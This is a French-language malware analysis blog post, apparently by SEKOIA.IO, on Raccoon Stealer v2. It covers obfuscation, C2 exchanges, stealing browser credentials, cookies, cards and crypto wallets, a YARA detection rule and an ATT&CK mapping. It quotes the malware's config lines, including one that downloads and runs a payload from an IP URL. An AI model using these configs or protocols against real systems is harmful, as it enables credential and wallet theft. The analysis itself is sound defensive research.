Sommaire
- Introduction
- Présentation technique
- Liaison dynamique à l’exécution
- Techniques d’obscurcissement
- Vérification de l’hôte
- Communication C2 initiale
- Configuration des DLL
- Empreintes de l’hôte
- Grand aperçu sur la configuration
- Récapitulatif des fonctions
- Extraction de données avec sqlite3.dll
- Extraction de données avec nss3.dll
- Wlts_ extraction
- Wallet.dat
- File grabber
- Enquête sur le cache de Telegram
- Capture d’écran
- Prochaine étape du chargeur
- Résumé des communications Command and Control de Raccoon Stealer
- Règle YARA de Raccon Stealer
- Extracteur de configuration
- Extensions de navigateur et portefeuilles ciblés
- MITRE ATT&CK TTP
Introduction
Raccoon est un logiciel malveillant qui vole des informations comme les voleurs de portefeuilles de crypto-monnaie tels que AgentTesla, Formbook, Redline et Vidar. En mars 2022, Raccoon Team a annoncé sa retraite temporaire en raison de membres manquants de l’équipe liés au conflit entre l’Ukraine et la Russie qui a débuté en février 2022 sur différents forums (c’est-à-dire xss[.]is). Ils ont également mentionné qu’ils travaillaient sur une nouvelle version du malware.
Ce billet de blog est une analyse technique de la nouvelle version autonome de Raccoon Stealer 2.0. Les auteurs ont annoncé que le malware est également disponible au format DLL ou pourrait être intégré dans d’autres PE.
Lien vers l’échantillon analysé : https://bazaar.abuse.ch/sample/022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03/
Cet article fait suite à la première publication sur Raccoon Stealer v2 pour analyser en profondeur les fonctionnalités et les capacités des logiciels malveillants.
Présentation technique
Raccoon Stealer v2 est écrit en C/C++ et ASM, la version autonome fait environ 56 Ko, les logiciels malveillants obscurcissent sa configuration et ses chaînes. Il effectue également une liaison dynamique. La communication avec ses serveurs de commande et de contrôle s’effectue via HTTP ; aucun cryptage ou obfuscation des données n’est utilisé pour échanger avec le serveur de l’attaquant.
Raccoon v2 cible divers portefeuilles cryptographiques, récupère les cookies et enregistre les numéros de carte de crédit des navigateurs (Edge, Firefox et Chrome).
Liaison dynamique à l’exécution
La première tâche effectuée par le logiciel malveillant consiste à lier les fonctions des bibliothèques. Au départ, le PE initie les descripteurs à `Shell32.dll`, `WinInt.dll`, `Crypt32.dll`, `Ole32.dll`, `User32 .dll`, `Advapi32.dll` et Kernel32.dll. Contrairement aux autres malwares de la même famille, Raccoon ne cache pas le chargement de `LoadLibrary` et `GetProcAddress` [T1055.001], de plus les fonctions importées des différentes librairies sont stockées en clair.
Figure 1. Partie de la fonction décompilée qui exécute la liaison dynamique à l’exécution
Techniques d’obscurcissement
Une fois les fonctions importées, Raccoon désobscurcit [T1140] une liste de chaînes utilisées pour configurer la communication de commande et de contrôle et les opérations d’exfiltration. Cette technique d’obfuscation est souvent mise en œuvre dans autres logiciels malveillants. Les chaînes masquées sont des chaînes cryptées RC4 [T1027] stockées en base64. L’exemple utilisait deux clés RC4 différentes, une pour décrypter les chaînes utilisées plus tard dans le programme et une seconde pour décrypter la liste de C2.
Figure 2. Exemple d’appels multiples à la première fonction de désobscurcissement
Figure 3. Version décompilée de l’algorithme RC4 utilisé dans Raccoon v2
logins.json
\autofill.txt
\cookies.txt
\passwords.txt
---
--
*/*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Type: multipart/form-data; boundary=
Content-Type: text/plain;
User Data
wallets
wlts_
ldr_
Figure 4. Extrait de données désobscurcies
Comme mentionné au début de cette section, Raccoon Stealer a utilisé une clé différente pour déchiffrer ses URL de commande et de contrôle ; les valeurs désobscurcies sont stockées dans un tableau. Ce tableau peut prendre jusqu’à 5 valeurs, que nous évaluons comme une capacité du logiciel malveillant à disposer d’une instance de commande et de contrôle de secours pour assurer la résilience.
Figure 5. Désobscurcissement du Command and Control avec la nouvelle clé RC4
désobscurci dans l’échantillon que nous avons analysé est : http://51.195.166[.]
Recette CyberChef pour désobscurcir les URL C2.
Mutex
Après la liaison dynamique à l’exécution et la désobfuscation des chaînes, le voleur vérifie l’existence d’un mutex. Dans l’échantillon que nous avons analysé, sa valeur est 8724643052. Si le mutex existe déjà, le processus se termine, sinon, le malware le crée et le malware continue.
Figure 7. Opération mutex dans Raccoon Stealer v2
Il convient de noter que le test mutex est la seule technique que nous avons observée dans l’échantillon qui empêcherait l’exécution de logiciels malveillants.
Vérification de l’hôte
Le logiciel malveillant vérifie ensuite les privilèges du processus en cours d’exécution et renvoie zéro si le SID (Security IDentifier) est S-1-5-18, qui signifie NT Authority\System. Cependant, cette fonction renvoie également zéro si le processus ne peut ni obtenir les informations de jeton ni convertir son SID en un type chaîne.
Figure 8. Code vérifiant les autorisations actuelles
Si l’autorisation du processus n’est pas Autorité NT\Système, ou si le processus ne peut pas obtenir ses informations de jeton, le logiciel malveillant n’exécute pas la fonction suivante qui boucle sur les processus en cours d’exécution [T1057]. Encore une fois, le résultat de cette fonction n’est pas critique pour le reste de l’exécution ; la valeur renvoyée est immédiatement effacée par l’instruction suivante. (cf.: `move eax, some value`).
Figure 9. Processus d’exécution de la liste des logiciels malveillants de l’hôte infecté
NB : Cette non-utilisation de la valeur de retour indique probablement que Raccoon Stealer v2 est toujours en cours de développement.
Communication C2 initiale
Après ce qui peut être considéré comme la phase d’initiation, le malware commence à établir sa première connexion au serveur de commande et de contrôle [T1041].
Tout d’abord, il obtient le MachineGuid en lisant le Registre [T1012] pour identifier l’hôte infecté : HKLM:\SOFTWARE\Microsoft\Cryptography\MachineGuid
Figure 10. Empreinte du MachineGuid via le Registre
Ensuite, il lit le nom d’utilisateur à partir de la bibliothèque Adavapi32.
Figure 11. Code utilisé pour obtenir le nom d’utilisateur
Finalement, les données sont concaténées avec la structure suivante :
machineId=<MachineGuid>|<UserName>&configId=<RC4 key>
Figure 12. Empreinte de l’hôte et communication du serveur de commande et de contrôle
Les données formatées sont envoyées au C2 via HTTP dans une requête POST à la racine du serveur. Il est intéressant de noter que la boucle demande la liste des C2 préalablement désobscurcis ; le logiciel malveillant demande chaque C2 de sa liste ; le premier à répondre avec des données est désigné comme C2 officiel pour la prochaine communication.
Le C2 répond par une importante configuration en texte clair, qui contient les informations suivantes :
- URL de téléchargement des DLL ;
- Fonctionnalités demandées :
- Faire une capture d’écran (cf.: `scrnsht_`);
- Enquête sur le cache de l’application de bureau Telegram (cf. : `tlgrm_`) ;
- Configuration et exécution de la prochaine étape (cf.: `ldr_1`);
- Extensions de navigateur à rechercher (cf.: `ews_`);
- Portefeuilles cryptographiques d’intérêt (cf.: `wlts_`);
- Un jeton utilisé pour définir le point de terminaison HTTP C2 pour une communication ultérieure.
Figure 13. Extrait de la configuration envoyée par le serveur C2 à l’hôte infecté
Toutes les configurations décrites ne sont pas toujours mises en place ; par exemple, la capture d’écran ou le chargeur de l’étape suivante sont souvent manquants, ils peuvent ne pas être présents par défaut.
Configuration des DLL
Comme présenté dans la section précédente, le malware récupère des informations sur les URL hébergeant les DLL à télécharger suivantes [T1105] :
- nss3.dll
- nssdbm3.dll
- msvcp140.dll
- vcruntime140.dll
- mozglue.dll
- freebl3.dll
- softokn3.dll
- sqlite3. dll
Il s’agit de DLL tierces légitimes permettant aux logiciels malveillants de collecter des données sur l’hôte infecté.
Figure 14. Extrait PCAP du téléchargement des DLL
Figure 15. Code décompilé téléchargeant les bibliothèques
Après avoir analysé la liste des DLL, le logiciel malveillant contacte un autre serveur de commande et de contrôle pour les télécharger. Les DLL sont ensuite déposées sur l’hôte infecté.
Remarque : À ce stade, les bibliothèques ne sont pas chargées en mémoire.
Empreintes de l’hôte
Raccoon prend les empreintes digitales de l’hôte infecté et les informations suivantes sont collectées [T1082] :
- ID utilisateur
- Fuseau horaire [T1614]
- Version du système d’exploitation
- Architecture hôte
- Informations sur le processeur
- Capacité de mémoire vive
- Informations sur les périphériques d’affichage
- Lister les applications installées [T1518]
Figure 16. Empreinte digitale avancée de l’hôte
Toutes les informations sont rassemblées dans un fichier nommé System Info.txt
qui est envoyé au serveur C2 dans une requête POST avec le type de contenu application/x-object
. Cette fois, l’URL C2 change, le jeton extrait de la configuration (celui reçu dans la première réponse HTTP) est utilisé comme nouveau point de terminaison HTTP.
Figure 17. Paquet envoyé au C2 contenant des informations d’empreintes digitales
Grand aperçu sur la configuration
Comme présenté dans la section « Initiation de la communication C2 », l’exemple permet de voir une configuration avec une structure particulière. Chaque ligne de la configuration, qui est basée sur du texte, définit la manière de collecter des informations sur l’hôte. L’extension Web du navigateur, comme illustré ci-dessous par deux exemples de configuration :
ews_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings
wlts_xmr:Monero;5;Monero\\wallets;*.keys;
La configuration des extensions de navigateur est définie par trois valeurs séparées par un point-virgule : le nom du répertoire d’extension du navigateur, le nom et le type d’extension, le type d’extension pouvant être « Paramètres d’extension locale » ou « IndexedDB ».
La configuration des portefeuilles est un peu plus complexe. Ici, les valeurs sont séparées par un point-virgule : la première valeur est le nom du portefeuille, la deuxième valeur est un entier, les valeurs suivantes sont le modèle de fichiers et/ou de répertoires à rechercher.
Récapitulatif des fonctions
Le flux d’exécution des fonctions suivantes est le suivant (chaque étape est détaillée dans les sections suivantes de cet article) :
- Utiliser sqlite3.dll pour récupérer les informations de carte de crédit, les cookies et les mots de passe enregistrés par navigateur (remplissage automatique) [T1539] [ T1555.003] ;
- Utilisez mozglue3.dll pour obtenir logins.json, les cookies et les historiques de Firefox [T1539] ;
- Analyser la configuration reçue pour rechercher des portefeuilles cryptographiques particuliers (cf.: `wlts_` et `ews_`)[T1005] ;
- Fichier de recherche nommé `wallet.dat` [T1005] ;
- Récupérez les fichiers selon le modèle défini dans la configuration ; [facultatif] [T1119] Enquêtez
- sur le cache de Telegram Desktop ; [facultatif]
- Capturez une capture d’écran du bureau hôte infecté ; [facultatif] [T1113]
- Charger et exécuter l’étape suivante. [facultatif] [T1106]
Figure 18. Partie de la fonction principale effectuant le vol de données, capture d’écran et chargement de l’étape suivante
Extraction de données avec sqlite3.dll
La première fonction chargée de voler des données sur l’hôte infecté parcourt les fichiers pour rechercher ` Données utilisateur` (navigateurs Edge et Chrome) et noms de fichiers «pera».
Figure 19. Extrait du code exécutant les requêtes SQL
Une fois qu’un fichier est trouvé, le malware déclenche l’exécution d’une liste de fonctions qui exécutent des requêtes sqlite, puis leurs résultats sont analysés et formatés pour être envoyés au serveur C2.
Les deux captures d’écran suivantes sont des exemples de requêtes SQL pour obtenir [T1539] [T1555.003] :
- cookies
- informations sur les cartes de crédit (nom du titulaire, numéro, date d’expiration)
Figure 20. Exemple de SQL utilisé pour récupérer les cookies
Figure 21. Exemple de requête SQL utilisée pour récupérer les numéros de carte de crédit à partir du fichier Google Chrome
Enfin, la fonction analysera la configuration récupérée (par exemple : `ews_`) et recherchera le répertoire des extensions du navigateur (généralement situé sous AppData\Local\Google\User Data\Default\Extensions pour Google Chrome).
Lorsque des données sont collectées à partir de différentes sources, le malware formate ces données avant de les envoyer au serveur C2.
Constat intéressant : pour chaque fonction qui utilise les fonctions exportées de sqlite3.dll, le malware réaffecte les importations (cf.: `GetProcAddress`). Un comportement similaire est observé pour les autres DLL téléchargées.
Figure 22. Référence au chargement de la fonction sqlite3 prepare_v2
Extraction de données avec nss3.dll
Le processus est le même avec nss3.dll, le logiciel malveillant recherche des fichiers particuliers correspondant à des modèles connus liés au navigateur Web.
Cette fois, il cible les cookies, les fichiers logins.json et l’historique du navigateur [T1539] [T1555.003].
Figure 23. Autre fonction responsable de la récupération des données du navigateur Web
Wlts_ extraction
Une liste de portefeuilles à rechercher sur l’hôte infecté est envoyée par le C2, ces portefeuilles sont préfixés par `wlts_`. La méthode est simple : elle boucle sur la configuration lorsque les six premiers octets correspondent à `wlts_`, puis Raccoon Stealer analyse le reste de la ligne de configuration pour rechercher des modèles de fichiers particuliers. En cas de correspondance de modèle, le fichier est copié et envoyé au serveur C2 [T1005].
Figure 24. Extrait de la configuration envoyée par le C2 utilisé pour l’enquête sur le portefeuille
Figure 25. Flux de travail de la fonction utilisée pour rechercher un fichier, en copier le contenu et le formater pour le C2
- Boucler sur les fichiers et les répertoires jusqu’à ce qu’un motif corresponde
- Créer une copie de le fichier
- Formate les données exfiltrées avant de les envoyer au C2
Encore une fois, si un portefeuille est trouvé, une requête POST HTTP avec une copie du portefeuille écrite dans le corps est envoyée au C2 ; sinon aucune demande n’est faite.
Wallet.dat
Dans cette fonction, Raccoon Stealer parcourt les différents répertoires pour rechercher les fichiers nommés wallet.dat (ref : bitcoin wallet). Aucune opération particulière n’est effectuée sur ce fichier [T1005] [T1083].
Figure 26. Extrait du code utilisé pour rechercher le fichier wallet.dat
File grabber
Dans la configuration, le malware peut recevoir la ligne suivante :
grbr_:%USERPROFILE%\Desktop|.*txt`|*recycle*,*windows*|20 |1|1|1|fichiers
La configuration ci-dessus indique au logiciel malveillant de rechercher tous les fichiers texte (.txt) dans le dossier du bureau [T1083] [T1119]. Aucune opération particulière n’est effectuée sur le nom du fichier ou son contenu. Dans le cas où un fichier correspond au modèle donné, une copie est envoyée au C2.
Enquête sur le cache de Telegram
La dernière fonction de vol utilisée par Raccoon Stealer consiste à enquêter sur les données du cache de Telegram Desktop situées sous le répertoire `Telegram Desktop\tdata`.
La ligne de configuration associée est :
tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*
Le répertoire « tdata » de l’application Telegram Desktop est utilisé pour stocker le cache de l’application où des données précieuses sont stockés, par exemple les cookies de session.
Capture d’écran
Une autre capacité du Raccoon Stealer est de prendre une capture d’écran et de l’envoyer au serveur C2 [T1113]. La figure ci-dessous montre le processus initialisant le contexte de périphérique sur le gestionnaire de fenêtres du bureau, suivi de la capture d’une zone et de sa conversion en bitmap.
Figure 27. Code décompilé utilisé pour créer la capture d’écran
L’opération de capture d’écran est facultative dans le workflow Raccoon. La condition pour exécuter cette fonction est de recevoir dans la configuration la ligne `scrnsht_` (cf.: `scrnsht_Screenshot.jpeg|1`), où le nom de la capture `Screenshot.jpeg` sera préfixé par `—` avant d’être exfiltré au serveur C2 avec le type de contenu `application/x-object`.
Figure 28. Paquet HTTP contenant la capture d’écran envoyée au C2
Prochaine étape du chargeur
Enfin, le malware finit par traiter la configuration envoyée dans la première réponse HTTP, en parsant sa dernière ligne :
ldr_1:http://94.158.244.119/U4N9B5X5F5K2A0L4L4T5/84897964387342609301.bin|%TEMP%\|exe
‘X’ est un entier dont la valeur indique quel type de chargement doit être utilisé :
- ‘3’ indique d’exécuter directement la charge utile (aucune enquête n’a été effectuée sur ce cas en raison du manque d’échantillon correspondant à ce scénario) ;
- ‘2’ n’est pas implémenté ;
- `1` signifie que la charge utile est située sur un hôte distant et doit être téléchargée avant d’être exécutée.
Figure 29. Chargement du payload suivant depuis un fichier distant et son exécution avec la fonction ShellExecuteW
NB : Nous estimons que le dernier argument (PE type) dans la ligne de configuration permet vraisemblablement à Raccoon Stealer de charger d’autres binaires qu’exécutables, comme un shellcode ou une DLL, qui peut être intégrée dans le binaire Raccoon Stealer.
Résumé des communications Command and Control de Raccoon Stealer
Après le chargement et l’exécution de l’étape suivante, le travail de Raccoon Stealer est terminé. Pour résumer, voir la capture réseau de l’échantillon analysé ci-dessous, qui montre un échange typique entre le serveur de commande et de contrôle et l’hôte infecté :
Figure 30. Résumé de la communication réseau entre l’hôte infecté et le C2 avec Wireshark
- Enregistrez le nouveau l’hôte infecté et récupérez la configuration du voleur ;
- Télécharger des DLL ;
- Envoyez System Info.txt avec les informations d’empreinte digitale de l’hôte ;
- Envoyer des données volées (portefeuille(s), mot(s) de passe, etc…) ;
- Envoyer le fichier
---Screenshot.jpeg
; - Téléchargez la prochaine étape de l’infection.
Règle YARA de Raccon Stealer
Comme décrit dans la section des techniques d’obfuscation, la nouvelle version de Raccoon Stealer masque ses chaînes et sa configuration en utilisant une technique très courante (base64 encodé avec RC4). La règle YARA suivante correspond à l’algorithme de déchiffrement RC4 mis en œuvre et à au moins 20 occurrences de la routine de désobscurcissement de chaîne.
.
rule infostealer_win_raccoon_v2_rc4 {
meta:
malware = "Raccoon"
description = "Finds samples of the Raccoon Stealer V2 based on the RC4 decryption algorithm and the deobfuscation routine"
author = "SEKOIA.IO"
creation_date = "2022-06-16"
modification_date = "2022-06-16"
strings:
$rc4_opcode = {99 f7 7d fc 8b 45 10 0f be 04 02 03 c1 03 f0 81 e6 ?? ?? ?? ?? 79 08 4e 81 ce ?? ?? ?? ?? 46}
$deobfuscation = {8d 4d ?? 51 50 8b ce e8 ?? ?? 00 00 8d 55 ?? a3 ?? ?? ?? ?? b9 ?? ?? ?? ?? e8 ?? ?? ff ff 57}
condition:
$rc4_opcode and #deobfuscation > 20 and filesize < 70KB
}
Extracteur de configuration
Le script d’extraction python fonctionne uniquement pour le PE autonome de Raccoon Stealer v2 et il est disponible sur le Github de la communauté SEKOIA.IO.
Extensions de navigateur et portefeuilles ciblés
- Bitcoin
- Exodus
- Atomic
- JaxxLiberty
- Binance
- Coinomi
- Electrum
- Electrum-LTC
- ElectrumCash
- Guarda
- BlockstreamGreen
- Ledger
- Daedalus
- MyMonero
- Monero
- Wasabi
Extensions Web de navigateur ciblées
- MetaMask
- TronLink
- BinanceChain
- Ronin
- MetaX
- XDEFI
- WavesKeeper
- Solflare
- Rabby
- CyanoWallet
- Coinbase
- AuroWallet
- KHC
- TezBox
- Coin98
- Temple
- ICONex
- Sollet
- CloverWallet
- Neo
- PolymeshWallet
- Keplr
- TerraStation
- Liquality
- SaturnWallet
- GuildWallet
- Phantom
- TronLink
- Brave
- MEW_CX
- TON
- Goby
MITRE ATT&CK TTP
Tactique | Technique | Description |
Defense Evasion | T1140 – Désobscurcissement/Décodage de fichiers ou d’informations | Raccoon Stealer 2.0 décode les chaînes et la configuration C2 dans le logiciel malveillant à l’aide de RC4 et base64. |
Defense Evasion | T1027 – Fichiers ou informations masqués | Raccoon Stealer 2.0 utilise des chaînes cryptées RC4. |
Accès | T1539 – Steal Web Session Cookie | Raccoon Stealer 2.0 récolte les cookies des navigateurs populaires. |
Accès | aux informations d’identification T1555.003 – Informations d’identification des magasins de mots de passe : informations d’identification des navigateurs Web | Raccoon Stealer 2.0 collecte les mots de passe des navigateurs populaires. |
Discovery | T1083 – Découverte de fichiers et de répertoires | Raccoon Stealer 2.0 répertorie les fichiers et les répertoires pour récupérer des fichiers sur tous les disques. |
Discovery | T1057 – Process Discovery | Raccoon Stealer 2.0 répertorie les processus en cours d’exécution sur le système. |
Discovery | T1012 – Interroger le registre | Raccoon Stealer 2.0 interroge la clé de registre Windows sur HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid pour récupérer la valeur MachineGuid. |
Discovery | T1518 – Software Discovery | Raccoon Stealer 2.0 répertorie tous les logiciels installés pour la machine infectée, en interrogeant la clé de registre Windows sur HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\uninstall |
Discovery | T1082 – System Information Discovery | Raccoon Stealer 2.0 collecte la version du système d’exploitation, l’architecture de l’hôte , les informations sur le processeur, la capacité de la RAM et les informations sur le périphérique d’affichage. |
Discovery | T1614 – System Time Discovery | Raccoon Stealer 2.0 collecte les informations de fuseau horaire du système. |
Collection | T1119 – Collection automatisée | Raccoon Stealer 2.0 analyse les disques et collecte automatiquement les fichiers. |
Collecte | T1005 – Données du système local | Raccoon Stealer 2.0 collecte les informations d’identification des portefeuilles de crypto-monnaie du système local. |
Collection | T1113 – Capture d’écran | Raccoon Stealer 2.0 capture une capture d’écran du bureau de la victime. |
Commande et contrôle | T1071.001 – Protocole de couche application : Protocoles Web | Raccoon Stealer 2.0 utilise HTTP pour les communications C2. |
Command and Control | T1041 – Exfiltration sur le canal C2 | Raccoon Stealer 2.0 exfiltre les données sur le canal C2. |
Command and Control | T1105 – Ingress Tool Transfer | Raccoon Stealer 2.0 télécharge des DLL tierces légitimes pour la collecte de données sur des hôtes compromis. |
Exécution | T1106 – L’API native | Raccoon Stealer 2.0 a la capacité de lancer des fichiers à l’aide de ShellExecuteW. |
Defense Evasion | T1055.001 – Injection de processus : injection de bibliothèque de liens dynamiques | Raccoon Stealer 2.0 a la capacité de charger des DLL via LoadLibraryW et GetProcAddress. |
Defense Evasion | T1407 – Télécharger le nouveau code au moment de l’exécution | Raccoon Stealer 2.0 télécharge sa prochaine étape à partir d’un hôte distant. |
Merci d’avoir lu cet article. Vous pouvez également lire notre article sur :
- Campagne de smishing Roaming Mantis en cours ciblant la France.
- BumbleBee : un nouveau loader tendance pour Initial Access Brokers.
- Le paysage des menaces ransomware observé par SEKOIA.IO durant le 1ᵉʳ semestre 2022
- Traffers : une plongée dans l’écosystème des voleurs d’informations
- XDR vs Ransomware
- Deux parfums de XDR
- Vice Society : un groupe de rançongiciels à double extorsion discret mais régulier
- Stealc: a copycat of Vidar and Raccoon infostealers gaining in popularity – Part 1
- Following NoName057(16) DDoSia Project’s Targets
Échangez avec l’équipe
Vous souhaitez en savoir plus sur nos solutions de protection ? Vous voulez découvrir nos produits de XDR et de CTI ? Vous avez un projet de cybersécurité dans votre organisation ? Prenez rendez-vous et rencontrons-nous !